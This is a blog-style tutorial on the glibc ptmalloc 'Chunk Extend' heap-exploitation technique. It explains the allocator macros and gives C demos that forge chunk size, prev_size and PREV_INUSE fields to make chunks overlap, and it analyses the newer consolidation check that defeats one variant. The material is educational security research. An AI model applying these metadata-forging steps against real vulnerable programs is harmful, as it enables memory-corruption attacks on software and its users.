TL;DR

I wrote this note and stored it in my database long ago. Now I am summarizing it again from my own perspective, adding some new understanding that I could not find much related content about on the internet. Chunk Extend is a frequently used and fundamental technique in Heap Exploitation.

Note that this post always assumes a 64-bit system. An obsolete technique is introduced at the end of this article, which helps us identify the new security check on backward consolidation in recent versions of glibc.

Prerequisites

- We've found a heap-based vulnerability in the program, such as overflows, off-by-null, etc.

- The vulnerability allows us to control chunk metadata, so that we can extend the chunk by modifying its relevant header data.

Overview

We use the Chunk Extend Attack in Heap Exploitation very often to achieve Chunk Overlapping. Once we manage to make two chunks overlap (for example, a normally malloc'd chunk we can write to, and the target victim chunk), we can overwrite data in the victim chunk simply by writing into the overlapping area through the malloc'd chunk we control.

The Chunk Extend Attack is easy to understand: we abuse certain chunk metadata to extend the size of a chunk we control so that it covers the target victim chunk. The next chapter discusses how this happens by analyzing the source code of Ptmalloc, the heap allocator of glibc.

Mechanism



As we summarized above, we need to leverage a vulnerability to perform Chunk Extend Attack by controlling its metadata. It's because Ptmalloc identifies the size of the chunk by extracting its information located at chunk header. Relevant chunk structure can be illustrated as follow in my perspective:

Therefore, we need to figure out how Ptmalloc reads these fields through certain macros defined in the glibc source code.
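For reference, here is a simplified mirror of the header these macros read, modeled on glibc's struct malloc_chunk. It assumes a 64-bit build where INTERNAL_SIZE_T is a size_t, and the chunk2mem/mem2chunk helpers are simplified versions written for illustration. The offsets explain why, in the demos later in this post, ptr - 0x8 is the size field and ptr - 0x10 is the prev_size field of a malloc'd pointer.

```c
#include <stddef.h>

/* Simplified mirror of glibc's struct malloc_chunk, assuming a 64-bit build
   where INTERNAL_SIZE_T is size_t. */
typedef size_t INTERNAL_SIZE_T;

struct malloc_chunk {
    INTERNAL_SIZE_T mchunk_prev_size;  /* size of the previous chunk, only valid if it is free */
    INTERNAL_SIZE_T mchunk_size;       /* size of this chunk | PREV_INUSE | IS_MMAPPED | NON_MAIN_ARENA */
    struct malloc_chunk *fd;           /* free-list links, only used while the chunk is free */
    struct malloc_chunk *bk;
    struct malloc_chunk *fd_nextsize;  /* large bins only */
    struct malloc_chunk *bk_nextsize;
};

typedef struct malloc_chunk *mchunkptr;

/* The pointer returned by malloc() skips the two header words (simplified). */
#define chunk2mem(p)   ((void *) ((char *) (p) + 2 * sizeof(INTERNAL_SIZE_T)))
#define mem2chunk(mem) ((mchunkptr) ((char *) (mem) - 2 * sizeof(INTERNAL_SIZE_T)))
```

So for a user pointer ptr on 64-bit, ((size_t *) ptr)[-1] is the size field and ((size_t *) ptr)[-2] is the prev_size field.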

Get Current Chunk Size

There are two macros for getting the size of the current chunk, used in different situations:

```c
/*
   Bits to mask off when extracting size

   Note: IS_MMAPPED is intentionally not masked off from size field in
   macros for which mmapped chunks should never be seen. This should
   cause helpful core dumps to occur if it is tried by accident by
   people extending or adapting this malloc.
*/
#define SIZE_BITS (PREV_INUSE | IS_MMAPPED | NON_MAIN_ARENA)

/* Get size, ignoring use bits */
#define chunksize(p) (chunksize_nomask (p) & ~(SIZE_BITS))

/* Like chunksize, but do not mask SIZE_BITS. */
#define chunksize_nomask(p) ((p)->mchunk_size)
```

- SIZE_BITS Macro:

  SIZE_BITS is a bitmask covering the low bits of the size field that Ptmalloc uses for internal bookkeeping; they are irrelevant to the actual size of the chunk. The bits being masked off are:

  - PREV_INUSE (0x1): indicates whether the previous chunk is in use.
  - IS_MMAPPED (0x2): indicates whether the chunk was allocated with mmap.
  - NON_MAIN_ARENA (0x4): indicates whether the chunk belongs to a non-main arena.

  These bits are masked off to isolate the actual size of the chunk.

- chunksize Macro:

  chunksize(p) extracts the size of the chunk pointed to by p, ignoring the use bits (PREV_INUSE, IS_MMAPPED and NON_MAIN_ARENA). It does this by calling chunksize_nomask and then applying & ~(SIZE_BITS), which clears the bits specified in SIZE_BITS.

- chunksize_nomask Macro:

  chunksize_nomask(p) directly retrieves the raw size field of the chunk pointed to by p without masking off SIZE_BITS. It simply accesses the mchunk_size field of the chunk structure pointed to by p.

Overall, these are the macros that extract the size of allocated chunks. SIZE_BITS ensures that only the bits relevant to the size are considered when chunksize() determines the size of a chunk.
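To see the difference concretely, the sketch below applies the two macros to a minimal, hypothetical chunk header containing only prev_size and size (flag values as defined in glibc's malloc.c). A 0x20-byte chunk whose previous chunk is in use stores 0x21: chunksize() reports 0x20, while chunksize_nomask() returns the raw 0x21.

```c
#include <stddef.h>

/* Flag bits, as defined in glibc's malloc.c */
#define PREV_INUSE     0x1
#define IS_MMAPPED     0x2
#define NON_MAIN_ARENA 0x4
#define SIZE_BITS (PREV_INUSE | IS_MMAPPED | NON_MAIN_ARENA)

/* Minimal chunk header: only the two fields these macros touch. */
struct malloc_chunk {
    size_t mchunk_prev_size;
    size_t mchunk_size;
};

/* Same definitions as in glibc */
#define chunksize_nomask(p) ((p)->mchunk_size)
#define chunksize(p)        (chunksize_nomask (p) & ~(SIZE_BITS))
```

The same masking turns a raw value such as 0x7f into 0x78, which matters for the fake-chunk example that follows.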

Why are there two ways to extract the size of a chunk? Both appear in different parts of the glibc source code. In my opinion, the masking macro is less secure but more convenient in some cases: because it ignores SIZE_BITS, whatever value sits in that metadata is treated as a chunk size by the subsequent logic. That makes it much more convenient for a hacker to fake a chunk size during heap exploitation.

The nomask macro is more secure in many cases, which means we need to bypass certain checks to fake the chunk size metadata. For example, we used to fake a chunk near __malloc_hook and link it into a fastbin (this technique is now obsolete), which required finding a memory word of 0x000000000000007f to act as its size field. The fastbin index is computed from the masked size, so 0x7f is accepted as a 0x70 chunk, but the raw IS_MMAPPED and NON_MAIN_ARENA bits are still read directly by other checks. If these bits are not consistent, Ptmalloc will not accept such a fake chunk.
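A small sketch of why 0x7f works as a fake fastbin size: glibc compares the fastbin index computed from the masked size with the requested bin, so the low flag bits do not change the bin, while a flag such as IS_MMAPPED is read from the raw field. The fastbin_index formula is copied from glibc; masked_fastbin_index and raw_is_mmapped are hypothetical helpers for illustration.

```c
#include <stddef.h>

#define SIZE_SZ        (sizeof(size_t))
#define PREV_INUSE     0x1
#define IS_MMAPPED     0x2
#define NON_MAIN_ARENA 0x4
#define SIZE_BITS (PREV_INUSE | IS_MMAPPED | NON_MAIN_ARENA)

/* Same formula as glibc's fastbin_index() */
#define fastbin_index(sz) \
  ((((unsigned int) (sz)) >> (SIZE_SZ == 8 ? 4 : 3)) - 2)

/* Hypothetical helper: bin index from the masked size, as chunksize() would give it */
static unsigned int masked_fastbin_index(size_t raw_size)
{
    return fastbin_index(raw_size & ~(size_t) SIZE_BITS);
}

/* Hypothetical helper: raw flag read, like glibc's chunk_is_mmapped() */
static int raw_is_mmapped(size_t raw_size)
{
    return (raw_size & IS_MMAPPED) != 0;
}
```

Both 0x70 and 0x7f map to fastbin index 5 (the 0x70 bin), but only 0x7f also has the IS_MMAPPED bit set in its raw value.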

Get Next Chunk Size

Following the previous code snippet, glibc defines how Ptmalloc locates the next chunk:

```c
/* Ptr to next physical malloc_chunk. */
#define next_chunk(p) ((mchunkptr) (((char *) (p)) + chunksize (p)))
```

The code may not match the initial guess of most people, namely that Ptmalloc finds the next chunk by reading some field of the next chunk. Instead, it computes the address of the next chunk by adding the current chunk's size to the current chunk pointer!
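A sketch on a hypothetical fake heap (a static array standing in for heap memory, not real glibc state) shows the consequence: once chunk1's size field is changed from 0x21 to 0x41, next_chunk() skips over chunk2 entirely.

```c
#include <stddef.h>

#define PREV_INUSE     0x1
#define IS_MMAPPED     0x2
#define NON_MAIN_ARENA 0x4
#define SIZE_BITS (PREV_INUSE | IS_MMAPPED | NON_MAIN_ARENA)

struct malloc_chunk {
    size_t mchunk_prev_size;
    size_t mchunk_size;
};
typedef struct malloc_chunk *mchunkptr;

#define chunksize(p)  ((p)->mchunk_size & ~(SIZE_BITS))
#define next_chunk(p) ((mchunkptr) (((char *) (p)) + chunksize (p)))

/* Hypothetical fake heap: three adjacent 0x20 chunks at offsets 0x00, 0x20, 0x40. */
static size_t fake_heap[0x60 / sizeof(size_t)];

static mchunkptr chunk_at(size_t offset)
{
    return (mchunkptr) ((char *) fake_heap + offset);
}

static void init_fake_heap(void)
{
    for (size_t off = 0; off < sizeof(fake_heap); off += 0x20) {
        chunk_at(off)->mchunk_prev_size = 0;
        chunk_at(off)->mchunk_size = 0x21;  /* 0x20 bytes, previous chunk in use */
    }
}
```

Usage: after init_fake_heap(), next_chunk(chunk_at(0x00)) is chunk_at(0x20); after setting chunk_at(0x00)->mchunk_size = 0x41 it becomes chunk_at(0x40).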

Get Previous Chunk Size

To get the previous chunk and its size, modern glibc defines the following macros:

```c
/* Size of the chunk below P. Only valid if !prev_inuse (P). */
#define prev_size(p) ((p)->mchunk_prev_size)

/* Set the size of the chunk below P. Only valid if !prev_inuse (P). */
#define set_prev_size(p, sz) ((p)->mchunk_prev_size = (sz))

/* Ptr to previous physical malloc_chunk. Only valid if !prev_inuse (P). */
#define prev_chunk(p) ((mchunkptr) (((char *) (p)) - prev_size (p)))
```

We can see that these macros share a common condition: they are only valid if !prev_inuse (P). When the PREV_INUSE bit is 0, meaning the previous chunk is not in use, the prev_size field of the current chunk records the size of the previous chunk. This is basic knowledge about the chunk structure.

- prev_size Macro:

  prev_size(p) retrieves the size of the chunk immediately preceding the chunk pointed to by p. It assumes that the previous chunk is not currently in use (!prev_inuse(p)), that is, it is free. It simply accesses the mchunk_prev_size field of the chunk structure pointed to by p.

- set_prev_size Macro:

  set_prev_size(p, sz) sets the recorded size of the chunk immediately preceding the chunk pointed to by p, again assuming !prev_inuse(p). It assigns the value sz to the mchunk_prev_size field of the chunk structure pointed to by p.

- prev_chunk Macro:

  prev_chunk(p) returns a pointer to the chunk immediately preceding the chunk pointed to by p. It calculates the address of the previous chunk by subtracting prev_size(p) from the address of the current chunk, then casts the result to a pointer to malloc_chunk (mchunkptr). Like the others, it is only valid if !prev_inuse(p).
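The sketch below shows how prev_chunk() trusts whatever prev_size says once PREV_INUSE is cleared. The fake heap is hypothetical and laid out like the forward-overlapping demo later in this post (a 0x90 chunk, two 0x20 victims, another 0x90 chunk); forge_prev is an illustrative helper standing in for a memory-corruption bug.

```c
#include <stddef.h>

#define PREV_INUSE 0x1

struct malloc_chunk {
    size_t mchunk_prev_size;
    size_t mchunk_size;
};
typedef struct malloc_chunk *mchunkptr;

/* Same definitions as in glibc */
#define prev_inuse(p)        ((p)->mchunk_size & PREV_INUSE)
#define prev_size(p)         ((p)->mchunk_prev_size)
#define set_prev_size(p, sz) ((p)->mchunk_prev_size = (sz))
#define prev_chunk(p)        ((mchunkptr) (((char *) (p)) - prev_size (p)))

/* Hypothetical fake heap: chunk1 (0x90) | victim1 (0x20) | victim2 (0x20) | chunk2 (0x90) */
static size_t fake_heap[0x160 / sizeof(size_t)];

static mchunkptr chunk_at(size_t offset)
{
    return (mchunkptr) ((char *) fake_heap + offset);
}

static void init_fake_heap(void)
{
    for (size_t i = 0; i < sizeof(fake_heap) / sizeof(fake_heap[0]); i++)
        fake_heap[i] = 0;
    chunk_at(0x00)->mchunk_size = 0x91;
    chunk_at(0x90)->mchunk_size = 0x21;
    chunk_at(0xb0)->mchunk_size = 0x21;
    chunk_at(0xd0)->mchunk_size = 0x91;
}

/* Hypothetical "overflow": clear PREV_INUSE of p and plant a fake prev_size. */
static void forge_prev(mchunkptr p, size_t fake_prev_size)
{
    p->mchunk_size &= ~(size_t) PREV_INUSE;
    set_prev_size(p, fake_prev_size);
}
```

After forge_prev(chunk_at(0xd0), 0xd0), prev_chunk(chunk_at(0xd0)) points at chunk1 (offset 0x00), so the supposed previous chunk spans chunk1 and both victims.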

Get Inuse Status

There is also a macro to check whether the current chunk is in use:

```c
/* extract p's inuse bit */
#define inuse(p) \
  ((((mchunkptr) (((char *) (p)) + chunksize (p)))->mchunk_size) & PREV_INUSE)
```

This means Ptmalloc determines the in-use status of the current chunk by checking the PREV_INUSE bit of the next chunk. The address of the next chunk is in turn calculated from the current chunk pointer and its size, which we can leverage in some cases.
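A hypothetical fake-heap sketch of that leverage: with a forged size, inuse() no longer reads the bit of the real neighbour but of whichever chunk the forged size points at. Here chunk1 is in use according to chunk2, yet after enlarging chunk1 to 0x40, inuse() reads chunk3's header and reports chunk1 as free.

```c
#include <stddef.h>

#define PREV_INUSE     0x1
#define IS_MMAPPED     0x2
#define NON_MAIN_ARENA 0x4
#define SIZE_BITS (PREV_INUSE | IS_MMAPPED | NON_MAIN_ARENA)

struct malloc_chunk {
    size_t mchunk_prev_size;
    size_t mchunk_size;
};
typedef struct malloc_chunk *mchunkptr;

#define chunksize(p) ((p)->mchunk_size & ~(SIZE_BITS))
/* Same definition as in glibc */
#define inuse(p) \
  ((((mchunkptr) (((char *) (p)) + chunksize (p)))->mchunk_size) & PREV_INUSE)

/* Hypothetical fake heap: chunk1 (in use), chunk2 (free), chunk3, each 0x20 bytes. */
static size_t fake_heap[0x60 / sizeof(size_t)];

static mchunkptr chunk_at(size_t offset)
{
    return (mchunkptr) ((char *) fake_heap + offset);
}

static void init_fake_heap(void)
{
    chunk_at(0x00)->mchunk_size = 0x21;      /* chunk1 */
    chunk_at(0x20)->mchunk_size = 0x21;      /* chunk2: PREV_INUSE=1, so chunk1 is in use */
    chunk_at(0x40)->mchunk_prev_size = 0x20; /* chunk3: records chunk2's size */
    chunk_at(0x40)->mchunk_size = 0x20;      /* chunk3: PREV_INUSE=0, so chunk2 is free */
}
```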

In conclusion, Ptmalloc reads the metadata (chunk header) to decide what a chunk looks like, and also to locate its previous and next chunks. When we can control this metadata, such as the size and prev_size fields, we can perform the Chunk Extend Attack, which results in chunk overlapping.

Ways to Extend

In terms of direction, there are mainly two ways to extend a chunk: forward overlapping and backward overlapping. The concept is similar to Ptmalloc's own forward consolidation and backward consolidation, except that consolidation is a legitimate, normal process.

In this chapter, we illustrate and discuss different examples of chunk overlapping achieved with the Chunk Extend Attack.

Tcache/Fastbin Chunk Extend

Let's say we want to perform a Chunk Extend Attack on a tcache/fastbin chunk (to attack a fastbin chunk, we can first fill the corresponding tcache bin with 7 chunks of the same size). Note that even after a tcache/fastbin chunk is freed, the PREV_INUSE bit in the next chunk remains 1, indicating that the chunk is still 'in use'.

We can use a simple demo code to show how to complete the attack:

int main(void)

{

void *ptr1,*ptr2;

ptr1=malloc(0x10); // Allocate a chunk in size of 0x10 (chunk1)

malloc(0x10); // Allocate another chunk also in size of 0x10 (chunk2)

*(long long *)((long long)ptr1-0x8)=0x41; // We micmic to leverage a vulnerability to modify the size field of chunk1

free(ptr1);

ptr2=malloc(0x30); // Complete Chunk Extend Attack. Now we have control for chunk2

return 0;





}After malloc() 2 times, we've got 2 chunks in size of 0x20. And the memory on heap now looks like:



Then, assume we have a heap overflow vulnerability that allows us to modify the metadata of chunk1. We change the value of chunk1's size field from 0x21 to 0x41, which makes it cover chunk2 exactly. The heap now looks like:


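The arithmetic behind these numbers can be sketched as follows. request2size here is a simplified 64-bit version of glibc's macro of the same name (constants assumed for x86-64), and extended_size_field is a hypothetical helper: chunk2 starts 0x20 bytes after chunk1 and is 0x20 bytes long, so the span is 0x40, and keeping PREV_INUSE set gives 0x41. A malloc(0x30) request maps to a 0x40-byte chunk, which is why it is served from tcache[0x40].

```c
#include <stddef.h>
#include <stdint.h>

#define SIZE_SZ           8
#define MALLOC_ALIGN_MASK (2 * SIZE_SZ - 1)
#define MINSIZE           0x20
#define PREV_INUSE        0x1

/* Simplified version of glibc's request2size() for 64-bit:
   the chunk size needed to serve malloc(req). */
static size_t request2size(size_t req)
{
    return (req + SIZE_SZ + MALLOC_ALIGN_MASK < MINSIZE)
               ? MINSIZE
               : (req + SIZE_SZ + MALLOC_ALIGN_MASK) & ~(size_t) MALLOC_ALIGN_MASK;
}

/* Hypothetical helper: the value to write into a chunk's size field so that
   it spans from the chunk start to the end of the victim chunk. */
static size_t extended_size_field(uintptr_t chunk, uintptr_t victim,
                                  size_t victim_size, int prev_in_use)
{
    size_t span = (size_t) (victim + victim_size - chunk);
    return span | (prev_in_use ? PREV_INUSE : 0);
}
```

Usage: extended_size_field(0x1000, 0x1020, 0x20, 1) gives 0x41, and request2size(0x30) gives 0x40.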

After releasing chunk1 with free(ptr1), Ptmalloc considers the size of chunk1 to be 0x40. Chunk1 is thus extended to 0x40 bytes and freed into tcache[0x40].

Now, if we call malloc(0x30), which requests a chunk of size 0x40, we are given this extended chunk from the tcache bin.

We can now write into the allocated 0x40-byte chunk, which means we can overwrite the data of chunk2, our victim. This is chunk overlapping.

Smallbin Chunk Extend

Small bins store chunks smaller than 0x400 (1024) bytes; the ones relevant here range from 0x90, just above the default fastbin limit of 0x80, up to 0x3f0. Extending a smallbin chunk to cover the victim chunk works no differently from what we did for tcache/fastbin chunks.

The only difference is that once the extended chunk is freed, the PREV_INUSE bit in the chunk following the extended chunk is cleared to 0.
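These bin boundaries follow from a few constants in glibc's malloc.c. The sketch below copies the 64-bit values and the in_smallbin_range/smallbin_index formulas for illustration (simplified: MALLOC_ALIGNMENT is assumed to be 2 * SIZE_SZ, as on x86-64); it is not included from glibc itself.

```c
#include <stddef.h>

/* 64-bit constants, following glibc's malloc.c (simplified) */
#define SIZE_SZ             8
#define MALLOC_ALIGNMENT    (2 * SIZE_SZ)
#define NSMALLBINS          64
#define SMALLBIN_WIDTH      MALLOC_ALIGNMENT
#define SMALLBIN_CORRECTION (MALLOC_ALIGNMENT > 2 * SIZE_SZ)
#define MIN_LARGE_SIZE      ((NSMALLBINS - SMALLBIN_CORRECTION) * SMALLBIN_WIDTH)
#define DEFAULT_MXFAST      (64 * SIZE_SZ / 4)  /* largest default fastbin chunk */

#define in_smallbin_range(sz) \
  ((unsigned long) (sz) < (unsigned long) MIN_LARGE_SIZE)
#define smallbin_index(sz) \
  ((SMALLBIN_WIDTH == 16 ? (((unsigned) (sz)) >> 4) : (((unsigned) (sz)) >> 3)) \
   + SMALLBIN_CORRECTION)
```

With these values MIN_LARGE_SIZE is 0x400 and DEFAULT_MXFAST is 0x80, so a 0x90 chunk is past the fastbin range and lands in small bin index 9, while 0x3f0 is the largest smallbin size.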

Backward Overlapping

The previous demo is exactly a backward overlapping. Note that after the attack, we can still allocate or free the overlapped chunks to perform further attacks.

Forward Overlapping (Obsolete)

If we want to overlap the previous chunk, as located by the prev_chunk macro defined in the source code, we need to leverage a vulnerability to modify both the prev_size field and the PREV_INUSE bit.

However, newer versions of glibc add a check that prevents us from using the traditional technique:

```c
/* Consolidate backward. */
if (!prev_inuse(p))
  {
    INTERNAL_SIZE_T prevsize = prev_size (p);
    size += prevsize;
    p = chunk_at_offset(p, -((long) prevsize));
    if (__glibc_unlikely (chunksize(p) != prevsize))
      malloc_printerr ("corrupted size vs. prev_size while consolidating");
    unlink_chunk (av, p);
  }
```

Let's first take a look at the old demo below and then analyze the new check in glibc:

#include <stdio.h>

#include <stdlib.h>

#include <stdint.h>

int main(void)

{

// disable buffering so _IO_FILE does not interfere with our heap

setbuf(stdin, NULL);

setbuf(stdout, NULL);

// fill up tcache bin

printf("\nFilling up tcache[0x90] bin ...\n");

intptr_t *x[9];

for(int i=0; i<sizeof(x)/sizeof(intptr_t*); i++) {

x[i] = malloc(0x80);

}

for(int i=0; i<sizeof(x)/sizeof(intptr_t*); i++) {

free(x[i]);

}

// Declare variables we will use

void *ptr1,*ptr2,*ptr3,*ptr4,*p;

ptr1=calloc(1, 0x80); // Smallbin chunk1;

ptr2=malloc(0x10); // Victim chunk1

ptr3=malloc(0x10); // Victim chunk2

ptr4=calloc(1, 0x80); // Smallbin chunk2

malloc(0x10); // Avoid consolidating to top chunk

free(ptr1);

*(int *)((long long)ptr4-0x8)=0x90; // Modify pre_inuse

*(int *)((long long)ptr4-0x10)=0xd0; // Modify pre_size

free(ptr4); // unlink from unsorted bin & forward overlapping

p=malloc(0x150); // Overlapping chunk

return 0;





}We first fill the tcache[0x90] with 7 dummy chunks and deploy 2 smallbin chunks into smallbin[0x90]. After allocation for 5 malloc(), we now have a memory map on the heap like:



We then release smallbin chunk1 into the unsorted bin with free(ptr1), so that later we can request it from the bin with malloc(). Being a genuinely free chunk, it also has valid fd/bk pointers for the unlink during consolidation. Subsequently, we mimic a vulnerability to modify the PREV_INUSE bit and the prev_size field of smallbin chunk2 (the purple chunk). The PREV_INUSE bit is changed from 1 to 0, and prev_size is changed from 0 to 0xd0.

Now we can release the purple smallbin chunk2 with free(ptr4). This makes Ptmalloc believe that the previous chunk of smallbin chunk2 is free and 0xd0 bytes long, covering smallbin chunk1, victim chunk1 and victim chunk2.



We cannot observe the detailed process in gdb at this point, because smallbin chunk2 (the purple chunk) is not simply released into the smallbin: freeing it triggers backward consolidation inside _int_free, which I will introduce in the future (or you can refer to my previous post about how Ptmalloc works). In short, Ptmalloc would coalesce the area from smallbin chunk1 (the blue chunk) to smallbin chunk2 (the purple chunk) into one big chunk. The free chunk in the unsorted bin is still shown with a size of 0x90, just like smallbin chunk1, because gdb extracts its metadata to display the result.

Then we try to make a request with malloc(0x150). Nothing seems to happen on the heap, as if the allocation had failed:



Then an error occurs and the program is aborted.

In older versions of glibc, we would already have a chunk overlapping primitive at this point. But the new check in backward consolidation prevents the attack from succeeding, so we need to improve the technique for chunk overlapping to work. Let's now take a deep dive into the security check:

Step 1. Condition Check:

```c
if (!prev_inuse(p))
```

This line checks whether the chunk before p is free (prev_inuse(p) returns 0 when the PREV_INUSE bit is cleared). In this case, we have successfully changed the bit to 0.

Step 2. Calculate Previous Chunk Size:

```c
INTERNAL_SIZE_T prevsize = prev_size (p);
```

Here, prev_size(p) retrieves the size of the previous chunk. Note that it reads the prev_size field stored in the header of the current chunk p, not the size field of the previous chunk itself. In this case, we have also successfully changed it to our desired value.

Step 3. Increment Current Size:

```c
size += prevsize;
```

This line adds the size of the previous chunk (prevsize) to the current chunk's size (size), effectively preparing to consolidate the two chunks into one larger chunk.

Step 4. Adjust Pointer to Start of Previous Chunk:

```c
p = chunk_at_offset(p, -((long) prevsize));
```

This adjusts p to point to the start of the previous chunk. chunk_at_offset is a macro that computes the address of the chunk at a given offset from p; here it moves p backwards by prevsize bytes, so p points to the beginning of the (supposed) previous chunk.

Step 5. Sanity Check:

```c
if (__glibc_unlikely (chunksize(p) != prevsize))
  malloc_printerr ("corrupted size vs. prev_size while consolidating");
```

This is where the security check stops our attack!

This check verifies that the size of the chunk now pointed to by p (after being moved to the start of the previous chunk) matches the expected prevsize. A mismatch indicates corrupted heap metadata, so malloc_printerr is called to print an error message and abort the program. __glibc_unlikely is a branch-prediction hint telling the compiler that this error is not expected under normal circumstances.
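The check can be replayed on a hypothetical fake heap laid out like the demo. This sketch mirrors only the size comparison from the "Consolidate backward" block (backward_check_passes is an illustrative helper, not a glibc function). With chunk1's genuine size 0x91 the check fails, and it only passes once chunk1's size field is also forged to 0xd0 (here 0xd1, since chunksize() masks the flag bit).

```c
#include <stddef.h>

#define PREV_INUSE     0x1
#define IS_MMAPPED     0x2
#define NON_MAIN_ARENA 0x4
#define SIZE_BITS (PREV_INUSE | IS_MMAPPED | NON_MAIN_ARENA)

struct malloc_chunk {
    size_t mchunk_prev_size;
    size_t mchunk_size;
};
typedef struct malloc_chunk *mchunkptr;

#define chunksize(p)          ((p)->mchunk_size & ~(SIZE_BITS))
#define prev_inuse(p)         ((p)->mchunk_size & PREV_INUSE)
#define prev_size(p)          ((p)->mchunk_prev_size)
#define chunk_at_offset(p, s) ((mchunkptr) (((char *) (p)) + (s)))

/* Hypothetical fake heap: chunk1 (0x90) | victim1 (0x20) | victim2 (0x20) | chunk2 (0x90) */
static size_t fake_heap[0x160 / sizeof(size_t)];

static mchunkptr chunk_at(size_t offset)
{
    return (mchunkptr) ((char *) fake_heap + offset);
}

static void init_forged_heap(void)
{
    for (size_t i = 0; i < sizeof(fake_heap) / sizeof(fake_heap[0]); i++)
        fake_heap[i] = 0;
    chunk_at(0x00)->mchunk_size = 0x91;
    chunk_at(0x90)->mchunk_size = 0x21;
    chunk_at(0xb0)->mchunk_size = 0x21;
    /* chunk2 after the simulated overflow: PREV_INUSE cleared, fake prev_size */
    chunk_at(0xd0)->mchunk_size = 0x90;
    chunk_at(0xd0)->mchunk_prev_size = 0xd0;
}

/* Returns 1 if the size comparison would pass, 0 if malloc_printerr would be called. */
static int backward_check_passes(mchunkptr p)
{
    size_t prevsize = prev_size(p);
    mchunkptr prev = chunk_at_offset(p, -((long) prevsize));
    return chunksize(prev) == prevsize;
}
```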

Step 6. Unlink the Chunk:

```c
unlink_chunk (av, p);
```

If all checks pass, this line unlinks the chunk pointed to by p from its free list (av is the arena managing this heap), so that it is no longer treated as a separate free chunk in later heap operations.
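unlink_chunk performs integrity checks of its own. The sketch below mirrors two of them in simplified form (not the complete function) on a hypothetical fake heap with a fake bin head. It suggests why chunk1 was freed first in the demo, so that its fd/bk links are valid, and why enlarging chunk1 to 0xd0 stays consistent: next_chunk() of the enlarged chunk1 is chunk2, whose forged prev_size is also 0xd0.

```c
#include <stddef.h>
#include <string.h>

#define PREV_INUSE     0x1
#define IS_MMAPPED     0x2
#define NON_MAIN_ARENA 0x4
#define SIZE_BITS (PREV_INUSE | IS_MMAPPED | NON_MAIN_ARENA)

struct malloc_chunk {
    size_t mchunk_prev_size;
    size_t mchunk_size;
    struct malloc_chunk *fd;
    struct malloc_chunk *bk;
};
typedef struct malloc_chunk *mchunkptr;

#define chunksize(p)  ((p)->mchunk_size & ~(SIZE_BITS))
#define prev_size(p)  ((p)->mchunk_prev_size)
#define next_chunk(p) ((mchunkptr) (((char *) (p)) + chunksize (p)))

/* Sketch of two integrity checks at the start of glibc's unlink_chunk();
   returns 1 if both would pass, 0 if malloc_printerr would be called. */
static int unlink_checks_pass(mchunkptr p)
{
    if (chunksize (p) != prev_size (next_chunk (p)))
        return 0;                               /* "corrupted size vs. prev_size" */
    if (p->fd->bk != p || p->bk->fd != p)
        return 0;                               /* "corrupted double-linked list" */
    return 1;
}

/* Hypothetical fake heap: chunk1 (0x90, free) | victim1 | victim2 | chunk2 (forged).
   A fake bin head links chunk1 as the only free chunk in its list. */
static _Alignas(16) unsigned char fake_heap[0x160];
static struct malloc_chunk fake_bin;

static mchunkptr chunk_at(size_t offset)
{
    return (mchunkptr) (fake_heap + offset);
}

static void init_fake_heap(void)
{
    memset(fake_heap, 0, sizeof(fake_heap));
    mchunkptr chunk1 = chunk_at(0x00);
    chunk1->mchunk_size = 0x91;
    chunk1->fd = chunk1->bk = &fake_bin;      /* valid links, as after free(ptr1) */
    fake_bin.fd = fake_bin.bk = chunk1;
    chunk_at(0x90)->mchunk_prev_size = 0x90;  /* footer left by free(ptr1) */
    chunk_at(0x90)->mchunk_size = 0x20;       /* victim1: PREV_INUSE cleared by free(ptr1) */
    chunk_at(0xb0)->mchunk_size = 0x21;       /* victim2 */
    chunk_at(0xd0)->mchunk_prev_size = 0xd0;  /* chunk2: forged prev_size */
    chunk_at(0xd0)->mchunk_size = 0x90;       /* chunk2: forged, PREV_INUSE cleared */
}
```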

In conclusion, this technique applies to smallbin or largebin chunks (tcache and fastbin chunks are not consolidated this way). If we want to perform the same Chunk Extend Attack in this case, we also need to change the size field of smallbin chunk1 (to 0xd0 in this case)! That requires leveraging another vulnerability, such as a heap overflow, which makes Forward Overlapping (via backward consolidation) much harder to perform. I will discuss the new method (creating a fake chunk inside the overlapped chunk) in a future post on the House of Einherjar attack for the newest versions of glibc.

